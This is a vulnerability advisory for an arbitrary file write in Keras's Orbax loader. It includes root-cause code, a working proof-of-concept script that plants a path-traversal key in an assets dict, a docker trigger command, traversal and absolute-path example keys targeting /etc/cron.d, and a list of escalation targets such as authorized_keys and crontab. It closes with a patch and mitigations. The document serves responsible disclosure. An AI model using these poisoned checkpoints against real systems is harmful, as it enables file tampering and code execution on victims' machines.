[internal-id: KERAS-MFV-001] Arbitrary file write at default keras.saving.load_model via Orbax assets path traversal
Severity: CVSS 3.1 8.6 High (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H). Per-metric justification: AV:L (file delivery; locally readable by the loader); AC:L (default args, no preconditions); PR:N (no privileges required of the attacker); UI:R (the victim must call load_model on the directory); S:C (the write escapes the loader's intended tempfile.TemporaryDirectory() boundary, affecting other security domains); C/I/A:H (arbitrary file write at user privilege chains to RCE-tier outcomes). A network-delivered framing — model directory auto-fetched and loaded by an upstream agent or pipeline — yields AV:N and 9.6 Critical.
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory — "Path Traversal") plus CWE-73 (External Control of File Name or Path). CWE-22 covers the relative-path (..) escape; CWE-73 covers the orthogonal absolute-path channel that bypasses os.path.join's base entirely.
Affected versions: Keras >= 3.14.0, <= 3.15.0 (HEAD 42b66280e). The Orbax loader was introduced in 40b910383 (#21903, 2026-01-12) and the assets checkpointable path through _write_nested_dict_to_dir in 449818056 (#22099, 2026-02-16). Both first ship in tag v3.14.0; HEAD declares __version__ = "3.15.0" and is still vulnerable.
Component: keras/src/saving/saving_lib.py (sink), keras/src/saving/saving_api.py (caller chain), keras/src/saving/orbax_util.py (auto-detection that opens the chain on default args).
Reporter: Independent security research.
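The two severity scores quoted above can be re-derived from their vector strings. The following is a minimal sketch of the CVSS 3.1 base-score equations as published in the FIRST specification. The function names are illustrative, and only base metrics are handled (no temporal or environmental metrics).

```python
import math

# Metric weights from the CVSS 3.1 specification (base metrics only).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal place using the spec's integer-based method."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the CVSS 3.1 base score for a vector string."""
    # Skip the leading "CVSS:3.1" element, then map metric name -> value.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    changed = metrics["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    iss = 1 - (
        (1 - CIA[metrics["C"]])
        * (1 - CIA[metrics["I"]])
        * (1 - CIA[metrics["A"]])
    )
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * pr * UI[metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))  # 8.6
print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))  # 9.6
```

Only the attack vector differs between the two vectors, which is why the network-delivered framing moves the score from High to Critical without any other metric changing.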
Summary
keras.saving.load_model(filepath) silently dispatches to an Orbax checkpoint loader whenever filepath is a directory whose listing contains a purely-numeric subdirectory (an Orbax "step directory"). The loader extracts an assets checkpointable — an attacker-supplied nested dict[str, dict | np.ndarray] — and feeds it to saving_lib._write_nested_dict_to_dir, which materialises each leaf at os.path.join(base_dir, key) with no validation of the key. Because keys are fully attacker-controlled, both .. traversal ("../../etc/cron.d/evil") and absolute-path overrides ("/etc/cron.d/evil", where os.path.join discards base_dir) write attacker-chosen bytes to attacker-chosen paths at the loader process's privilege.
Any user, or automated pipeline, who calls the default keras.saving.load_model on an attacker-supplied directory hands the attacker an arbitrary file write at the caller's own privilege level: a textbook RCE precursor via standard write-then-trigger gadgets.
Impact
- Arbitrary file write at the loader process's privilege. Each leaf of the malicious assets dict is written with open(child_path, "wb").write(value.tobytes()); both path and bytes are fully attacker-controlled.
- Both .. traversal and absolute-path keys are accepted. Verified in the PoC. Absolute keys bypass the base dir entirely with no .. segments, defeating naive "look for .." defences.
- Reachable from the default public API: keras.saving.load_model("attacker_dir/") suffices. No flag changes, no safe_mode=False, no extra custom_objects=. is_orbax_checkpoint (orbax_util.py:11–47) fires on any directory containing a numeric-named subdirectory, so a trivial mkdir attacker_dir/0 opens the chain.
- safe_mode=True does not help. safe_mode gates Lambda/object deserialisation deep inside _model_from_config; the assets-write fires on a separate code path that no existing flag mitigates.
- Standard escalation to RCE. Arbitrary-write-as-user chains via well-known categories: Python sitecustomize.py / .pth on the import path, user crontab / ~/.config/systemd/user/ unit, ~/.bashrc, ~/.ssh/authorized_keys, binary on $PATH. The advisory deliberately does not weaponise any of these.
- Multi-tenant impact. Model-serving containers and notebook hosts that pass user-controlled paths to load_model (HuggingFace-style "load by repo id" agents, MLOps "import this checkpoint" flows) hand the uploading party arbitrary-write inside the serving process.
Affected Versions
- First vulnerable release: Keras 3.14.0 (commits 40b910383 + 449818056, both first present at tag v3.14.0; verified with git merge-base --is-ancestor).
- Last vulnerable release at time of writing: Keras 3.15.0 (HEAD 42b66280e). _write_nested_dict_to_dir is unchanged since introduction.
- Reproduction confirmed at: HEAD 42b66280e (Phase 1 unit-level + Phase 2 reachability via keras.saving.load_model).
Pre-3.14 releases do not contain the Orbax loader and are not affected.
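A deployment can check an installed version against this range with a few lines of standard-library Python. This is a minimal sketch: the helper names are hypothetical, and the upper bound only reflects what was known at the time of writing, so a version above it is not thereby confirmed fixed.

```python
import re

FIRST_AFFECTED = (3, 14, 0)
LAST_KNOWN_AFFECTED = (3, 15, 0)  # HEAD at the time of writing


def release_tuple(version):
    """Extract the leading major.minor[.patch] numbers from a version string."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"Unrecognised version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def in_affected_range(version):
    """True when the version falls inside the range stated in this advisory."""
    return FIRST_AFFECTED <= release_tuple(version) <= LAST_KNOWN_AFFECTED


print(in_affected_range("3.13.2"))  # False
print(in_affected_range("3.14.0"))  # True
print(in_affected_range("3.15.0"))  # True
```

In practice the argument would be keras.__version__ from the environment under review.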
Vulnerability Details
Root cause
keras/src/saving/saving_lib.py:1776–1790:
def _write_nested_dict_to_dir(tree, base_dir):
    """Recursively write a nested dict of numpy arrays to a directory tree.

    Each dict key becomes a directory or filename. Leaf values (numpy
    arrays) are written as binary files.
    """
    for key, value in tree.items():
        child_path = os.path.join(base_dir, key)
        if isinstance(value, dict):
            os.makedirs(child_path, exist_ok=True)
            _write_nested_dict_to_dir(value, child_path)
        elif isinstance(value, np.ndarray):
            os.makedirs(os.path.dirname(child_path), exist_ok=True)
            with open(child_path, "wb") as f:
                f.write(value.tobytes())
The bug is that key is assumed to be a single path component (a "filename", per the docstring) but never enforced to be one. Three invariants fail simultaneously: (1) os.path.join(base_dir, key) returns key verbatim when key is absolute; (2) .. segments in key resolve child_path outside base_dir; (3) os.makedirs(os.path.dirname(child_path), exist_ok=True) happily creates intermediate directories along the escaped path. The save-side docstring at _save_assets_to_dict (saving_lib.py:1804–1806) ironically advertises the nested-dict representation as one that "avoids platform-specific path separator issues and zip-slip vulnerabilities" — precisely the class that exists on the load side, because the load side never re-validates.
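The three failing invariants can be observed with path arithmetic alone, without touching the filesystem. The sketch below uses posixpath (the POSIX implementation behind os.path) so the results do not depend on the host platform; the base_dir value is a hypothetical temporary directory name.

```python
import posixpath  # POSIX flavour of os.path, for platform-independent results

base_dir = "/tmp/tmpabcd1234"  # hypothetical TemporaryDirectory path

# (1) An absolute key makes join() discard base_dir entirely.
absolute = posixpath.join(base_dir, "/etc/cron.d/evil")

# (2) ".." segments survive join() and resolve outside base_dir.
traversal = posixpath.normpath(
    posixpath.join(base_dir, "../../etc/cron.d/evil")
)

# (3) dirname() of the escaped path is the directory os.makedirs would create.
parent = posixpath.dirname(traversal)

print(absolute)   # /etc/cron.d/evil
print(traversal)  # /etc/cron.d/evil
print(parent)     # /etc/cron.d
```

Both channels arrive at the same target, which is why a filter that only looks for .. segments is insufficient.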
Caller chain (reachability from public API)
- keras.saving.load_model(filepath) (re-exported as keras.models.load_model): saving_api.py:181+.
- saving_api.py:202–209: if is_orbax_checkpoint(filepath): return _load_model_from_orbax_checkpoint(filepath, ...). No flag changes required.
- orbax_util.py:11–47: is_orbax_checkpoint returns True for any directory whose listing contains a digit-named subdirectory or any of the markers orbax.checkpoint, pytree.orbax-checkpoint, checkpoint_metadata, .orbax-checkpoint-tmp. The attacker owns the directory, so mkdir attacker_dir/0 is enough.
- saving_api.py:363–445: _load_model_from_orbax_checkpoint opens the checkpoint via ocp.training.Checkpointer and requests pytree, model_config, and (when present) assets (line 426–427: if "assets" in saved_keys: request["assets"] = None).
- saving_api.py:443: saving_lib._load_assets_from_dict(model, assets_data) is called with the unvalidated nested dict round-tripped through Orbax storage.
- saving_lib.py:1856–1860: _load_assets_from_dict allocates a tempfile.TemporaryDirectory() and immediately calls _write_nested_dict_to_dir(assets_dict, tmp_dir). The vulnerability fires here, before the tempdir is read back.
grep -rn _load_assets_from_dict keras/ shows exactly one caller; patching at the sink closes the path.
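The auto-detection step is what makes the chain reachable on default arguments. The following sketch approximates the rule as this advisory describes it (a digit-named subdirectory or one of the listed marker names); it is not the Keras source, and the function name looks_like_orbax_checkpoint is hypothetical.

```python
import os
import tempfile

# Marker names as listed in this advisory; the real check is in orbax_util.py.
ORBAX_MARKERS = {
    "orbax.checkpoint",
    "pytree.orbax-checkpoint",
    "checkpoint_metadata",
    ".orbax-checkpoint-tmp",
}


def looks_like_orbax_checkpoint(path):
    """Approximate the described rule: digit-named subdir or marker entry."""
    if not os.path.isdir(path):
        return False
    for name in os.listdir(path):
        if name in ORBAX_MARKERS:
            return True
        if name.isdigit() and os.path.isdir(os.path.join(path, name)):
            return True
    return False


with tempfile.TemporaryDirectory() as attacker_dir:
    before = looks_like_orbax_checkpoint(attacker_dir)
    os.mkdir(os.path.join(attacker_dir, "0"))  # the "mkdir attacker_dir/0" step
    after = looks_like_orbax_checkpoint(attacker_dir)

print(before, after)  # False True
```

Under this rule the directory contents are the only input to the dispatch decision, so whoever supplies the directory also chooses the loader.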
Why safe_mode does not protect
safe_mode=True is the Keras knob for refusing untrusted Lambda layers and untrusted __class__ references during config deserialisation; that gate lives inside _model_from_config / deserialize_keras_object, called by _load_model_from_orbax_checkpoint at saving_api.py:413. The arbitrary file write happens later, at saving_api.py:443, on a sibling code path that never consults the gate, so flipping safe_mode either way has no effect.
Proof of Concept
The PoC at /home/zitu/mfv/poc/T1B/ reproduces the bug end-to-end in a sealed docker container, writing only a benign sentinel file (poc-marker-T1B-reach).
Environment
Docker image keras-poc:t1b (Python 3.11 + jax-cpu + numpy + orbax-checkpoint 0.11.x + h5py). Keras source mounted read-only at /keras-src; PoC volume mounted at /poc.
Build malicious artifact
/home/zitu/mfv/poc/T1B/run.py --build-only writes a real Orbax checkpoint whose assets checkpointable carries a path-traversal key. The essential payload:
import keras
import numpy as np
from orbax.checkpoint import v1 as ocp
from keras.src.saving import saving_lib

model = keras.Sequential(
    [keras.layers.Input(shape=(2,)), keras.layers.Dense(2)]
)
model.compile(optimizer="adam", loss="mse")
model.fit(np.zeros((1, 2)), np.zeros((1, 2)), epochs=1, verbose=0)
config_json, _ = saving_lib._serialize_model_as_json(model)

# Poisoned key escapes the tempfile.TemporaryDirectory() (e.g. /tmp/tmpXXXX).
malicious_assets = {
    "../../poc/poc-marker-T1B-reach": np.array(
        [0x52, 0x45, 0x41, 0x43, 0x48, 0x0A], dtype=np.uint8  # "REACH\n"
    )
}
payload = {
    "pytree": model.get_state_tree(),
    "model_config": {"config": config_json},
    "assets": malicious_assets,
}

checkpointer = ocp.training.Checkpointer(directory="/poc/evil_orbax")
with ocp.Context():
    checkpointer.save_checkpointables(0, payload)
checkpointer.wait_until_finished()
checkpointer.close()
The malicious dict round-trips through Orbax CompositeCheckpointHandler without sanitisation (key preserved verbatim in _strings.json on disk). An equally effective variant uses an absolute-path key ({"/etc/cron.d/evil": np.array([...], dtype=np.uint8)}) — os.path.join drops the base dir, no .. involved (the CWE-73 channel).
Trigger
docker run --rm --user $(id -u):$(id -g) \
    -v /home/zitu/mfv/keras:/keras-src:ro \
    -v /home/zitu/mfv/poc/T1B:/poc \
    -e PYTHONPATH=/keras-src -e KERAS_BACKEND=jax -e HOME=/tmp \
    keras-poc:t1b python /poc/run.py
Inside the container the PoC then runs keras.saving.load_model("/poc/evil_orbax") with all default arguments.
Expected evidence
calling _write_nested_dict_to_dir with key '../poc-marker-T1B-unit'
base_dir = '/poc/sandbox'
/poc/ contents:
FILE /poc/poc-marker-T1B-unit (4 bytes)
DIR /poc/sandbox
/poc/sandbox/ contents: (empty)
[Phase 1] CONFIRMED: file landed OUTSIDE base_dir at /poc/poc-marker-T1B-unit
contents = b'POC\n'
...
saved evil orbax checkpoint at /poc/evil_orbax
invoking keras.saving.load_model() on the evil checkpoint…
load_model() returned without raising
/poc/ contents after load_model():
FILE /poc/poc-marker-T1B-reach (6 bytes)
[Phase 2] REACHABLE: marker landed OUTSIDE the load tmpdir at /poc/poc-marker-T1B-reach
contents = b'REACH\n'
load_model() returns successfully (the model object is even usable); the side effect is silent.
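The Phase 1 unit-level behaviour can be approximated without Keras, Orbax, or numpy. The sketch below is a stand-in that mirrors the logic of the sink quoted under "Root cause", with bytes leaves in place of numpy arrays so that it runs on the standard library alone; the function name and the marker filename are hypothetical, and every write stays inside a throwaway temporary directory.

```python
import os
import tempfile


def write_nested_dict_to_dir(tree, base_dir):
    """Stand-in for the vulnerable sink, with bytes leaves instead of arrays."""
    for key, value in tree.items():
        child_path = os.path.join(base_dir, key)  # key is never validated
        if isinstance(value, dict):
            os.makedirs(child_path, exist_ok=True)
            write_nested_dict_to_dir(value, child_path)
        elif isinstance(value, bytes):
            os.makedirs(os.path.dirname(child_path), exist_ok=True)
            with open(child_path, "wb") as f:
                f.write(value)


with tempfile.TemporaryDirectory() as root:
    sandbox = os.path.join(root, "sandbox")
    os.makedirs(sandbox)
    # One ".." segment is enough to land the file next to the sandbox.
    write_nested_dict_to_dir({"../marker": b"POC\n"}, sandbox)
    escaped = os.path.exists(os.path.join(root, "marker"))
    sandbox_listing = os.listdir(sandbox)

print(escaped, sandbox_listing)  # True []
```

As in the Phase 1 log, the intended base directory ends up empty while the marker sits one level above it.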
Suggested Patch
Fix at the sink. Validate every key as a single well-formed path component, then realpath-check the resolved child path. Complete diff against keras/src/saving/saving_lib.py at HEAD 42b66280e (validated with git apply --check):
--- a/keras/src/saving/saving_lib.py
+++ b/keras/src/saving/saving_lib.py
@@ -1773,18 +1773,62 @@ def _split_path_components(path):
     return parts
 
 
+def _is_safe_assets_key(key):
+    """Return True iff ``key`` is a single safe pathname component.
+
+    Rejects empty strings, ``.``/``..`` segments, absolute paths, embedded
+    path separators (POSIX or Windows), and NUL bytes. The intent is that
+    each ``key`` in an assets nested-dict be a *filename*, never a path.
+    """
+    if not isinstance(key, str) or not key:
+        return False
+    if "\x00" in key:
+        return False
+    if os.path.isabs(key):
+        return False
+    # Disallow any path separator on either platform, plus drive letters
+    # of the form "C:..." which Windows treats specially in os.path.join.
+    if "/" in key or "\\" in key:
+        return False
+    if len(key) >= 2 and key[1] == ":":
+        return False
+    if key in (".", ".."):
+        return False
+    return True
+
+
 def _write_nested_dict_to_dir(tree, base_dir):
     """Recursively write a nested dict of numpy arrays to a directory tree.
 
     Each dict key becomes a directory or filename. Leaf values (numpy
     arrays) are written as binary files.
+
+    Keys are validated to be single safe filename components: keys
+    containing path separators, ``..`` segments, drive letters, NUL
+    bytes, or absolute paths are rejected. As defence-in-depth the
+    resolved child path is also required to stay under ``base_dir``.
     """
+    base_dir_real = os.path.realpath(base_dir)
     for key, value in tree.items():
+        if not _is_safe_assets_key(key):
+            raise ValueError(
+                f"Unsafe key in assets dict: {key!r}. Asset keys must be "
+                "single filename components without separators or "
+                "traversal segments."
+            )
         child_path = os.path.join(base_dir, key)
+        child_real = os.path.realpath(child_path)
+        if child_real != base_dir_real and not child_real.startswith(
+            base_dir_real + os.sep
+        ):
+            raise ValueError(
+                f"Path escape in assets dict: {key!r} resolves to "
+                f"{child_real!r} which is outside {base_dir_real!r}."
+            )
         if isinstance(value, dict):
             os.makedirs(child_path, exist_ok=True)
             _write_nested_dict_to_dir(value, child_path)
         elif isinstance(value, np.ndarray):
             os.makedirs(os.path.dirname(child_path), exist_ok=True)
             with open(child_path, "wb") as f:
                 f.write(value.tobytes())
Notes for the patch reviewer:
- The validator rejects POSIX/Windows separators, drive letters, NUL, absolute paths, and the . and .. segments. Legitimate assets produced by _save_assets_to_dict (saving_lib.py:1793–1841) are structurally guaranteed not to contain any of these, because they come from _split_path_components(os.path.relpath(...)) on a directory walk, so the check is a no-op when round-tripping a Keras-produced checkpoint.
- The realpath check is defence-in-depth against future call sites or symlink races; redundant but cheap on the current site.
- ValueError matches surrounding Keras style. Add a test in saving_lib_test.py that pins pytest.raises(ValueError) for keys ("../escape", "/etc/passwd", "a/b", "..", ".", "x\x00y").
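The key list suggested for the regression test can be exercised outside the Keras tree. The sketch below copies the validator body from the patch into a standalone function (renamed without the leading underscore) and runs it over the rejected keys; the accepted names and the extra "" and "C:evil" cases are illustrative additions, not taken from an existing test suite.

```python
import os


def is_safe_assets_key(key):
    """Standalone copy of the validator proposed in the patch."""
    if not isinstance(key, str) or not key:
        return False
    if "\x00" in key:
        return False
    if os.path.isabs(key):
        return False
    # Separators for either platform, then Windows drive-letter prefixes.
    if "/" in key or "\\" in key:
        return False
    if len(key) >= 2 and key[1] == ":":
        return False
    if key in (".", ".."):
        return False
    return True


REJECTED = ["../escape", "/etc/passwd", "a/b", "..", ".", "x\x00y", "", "C:evil"]
ACCEPTED = ["vocab.txt", "assets", "..hidden"]  # hypothetical legitimate names

rejected_ok = all(not is_safe_assets_key(k) for k in REJECTED)
accepted_ok = all(is_safe_assets_key(k) for k in ACCEPTED)
print(rejected_ok, accepted_ok)  # True True
```

A name such as "..hidden" is accepted because it is a single component that merely starts with two dots; only the exact segments . and .. are refused.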
Mitigations (interim)
For users who cannot upgrade once a fixed Keras is published:
- Do not pass untrusted directories to keras.saving.load_model. The Orbax detection fires on any directory with a numeric-named subdirectory, so attacker-supplied "model folders" trigger the path even when they don't look like Orbax checkpoints.
- Sandbox the loader process under bubblewrap / firejail / a rootless container with a read-only rootfs, or a seccomp filter that denies openat(O_CREAT) outside the model staging directory.
- Validate the assets sub-tree before loading: open the checkpoint via orbax-checkpoint directly, audit the assets dict's keys (reject empty, .., /, \\, NUL, :, absolute), then delegate to keras.saving.load_model only when clean.
- Pin Keras to < 3.14.0 if downgrading is acceptable; removes the entire affected code path.
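The key audit in the third mitigation can be sketched as a recursive walk over the nested dict. The function name find_unsafe_asset_keys is hypothetical, and the sketch assumes the assets dict has already been read from the checkpoint by some other means; how to obtain it through orbax-checkpoint is deliberately left out.

```python
def find_unsafe_asset_keys(tree, prefix=()):
    """Return the key paths in a nested assets dict that break the rules above."""
    offenders = []
    for key, value in tree.items():
        path = prefix + (key,)
        # POSIX absolute keys start with "/" and Windows ones contain ":" or
        # "\\", so the character checks below also cover the absolute case.
        bad = (
            not isinstance(key, str)
            or key in ("", ".", "..")
            or any(ch in key for ch in ("/", "\\", "\x00", ":"))
        )
        if bad:
            offenders.append(path)
        if isinstance(value, dict):
            offenders.extend(find_unsafe_asset_keys(value, path))
    return offenders


assets = {
    "vocab.txt": b"...",
    "nested": {"../../etc/cron.d/evil": b"...", "ok.bin": b"..."},
    "/abs": b"...",
}
print(find_unsafe_asset_keys(assets))
# [('nested', '../../etc/cron.d/evil'), ('/abs',)]
```

Returning the full key path rather than a boolean makes it easier to log which entry caused a checkpoint to be refused; an empty list is the signal to proceed with keras.saving.load_model.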
Credits
Reported by Independent security research (academic vulnerability research project, NTU, contact ziyu.lin@ntu.edu.sg), 2026-05-04.
Timeline
- 2026-05-04: Vulnerability discovered; primitive confirmed at _write_nested_dict_to_dir; reachability via keras.saving.load_model confirmed end-to-end inside docker; absolute-path variant confirmed.
- TBD: Reported privately to keras-security@google.com and via GHSA private vulnerability report against keras-team/keras.
- TBD: Patch released and CVE assigned.
- TBD: 90-day public disclosure.
References
- CWE-22 — Path Traversal: https://cwe.mitre.org/data/definitions/22.html
- CWE-73 — External Control of File Name or Path: https://cwe.mitre.org/data/definitions/73.html
- Commit introducing the Orbax loader: 40b910383 ("Orbax Loading and Sharding Support feature (#21903)").
- Commit introducing the assets dict path: 449818056 ("Add assets support to OrbaxCheckpoint using checkpointables API (#22099)").
- Related (different class, same component family): CVE-2026-1669 (Keras H5 external dataset file-read). The H5 advisory describes a read primitive; this advisory describes a write primitive in a sibling code path.
- Bug-class precedent: "Zip Slip" disclosure (Snyk, 2018); CVE-2007-4559 (Python tarfile traversal).